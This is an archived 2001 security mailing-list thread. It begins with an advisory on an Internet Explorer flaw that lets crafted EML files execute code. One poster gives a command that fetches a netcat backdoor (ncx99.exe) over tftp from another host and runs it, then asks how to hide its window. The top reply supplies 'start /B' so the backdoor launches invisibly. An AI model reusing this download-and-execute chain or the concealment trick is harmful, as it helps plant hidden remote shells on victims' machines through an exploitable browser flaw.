Try this:
c:\winnt\system32\tftp.exe -i 192.168.1.1 GET ncx99.exe c:\system.exe &&
start /B c:\nc0.exe

or read start /?

Eliel Sardañons

> -----Mensaje original-----
> De: Adriano Dias [SMTP:adiasPROTEUS.COM.BR]
> Enviado el: Friday, March 30, 2001 4:51 PM
> Para: FOCUS-MSSECURITYFOCUS.COM
> Asunto: RES: Incorrect MIME Header Can Cause IE to Execute E-mail
> Attachm ent
>
> Hi,
> I´m doing some tests with this vulnerability. I made a file who downloads
> the ncx99.exe and runs it, but i'm having a problem: when it downloads the
> file, it's running minimized, not hided. The commands are following:
> c:\winnt\system32\tftp.exe -i 192.168.1.1 GET ncx99.exe c:\system.exe &&
> start /min c:\nc0.exe
> does anybody have an idea to make it invisible?
>  
> Thank you!
>  
> Adriano Dias.
>
> -----Mensagem original-----
> De: Juan Carlos Garcia Cuartango [mailto:cuartangoTERRA.ES]
> Enviada em: Friday, March 30, 2001 6:00 AM
> Para: BUGTRAQSECURITYFOCUS.COM
> Assunto: Incorrect MIME Header Can Cause IE to Execute E-mail
> Attachment
>
>
> Hi,
> Microsoft has released a security bulletin
> <http://www.microsoft.com/technet/security/bulletin/ms01-020.asp> entitled
> "Incorrect MIME Header Can Cause IE to Execute E-mail Attachment".
> EML files are MIME multipart files that IE 5 will parse. There is a
> vulnerability allowing arbitrary code execution using this kind of files.
> This vulnerabiliy could allow an hostile page or e-mail to perform any
> action on your computer. The vulnerability affects IE 5, IE 5.5 over all
> windows platforms.
> I have prepared some demos about the vulnerability in
> www.kriptopolis.com <http://www.kriptopolis.com> (major spanish security
> site) :
> <http://www.kriptopolis.com/cua/eml.html>
> Note : It you want to have a look to the hostile EML files you must
> click the right mouse button over the pictures and select the "Save Target
> As" menu option.
> Regards,
> Juan Carlos G. Cuartango
>  
>

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]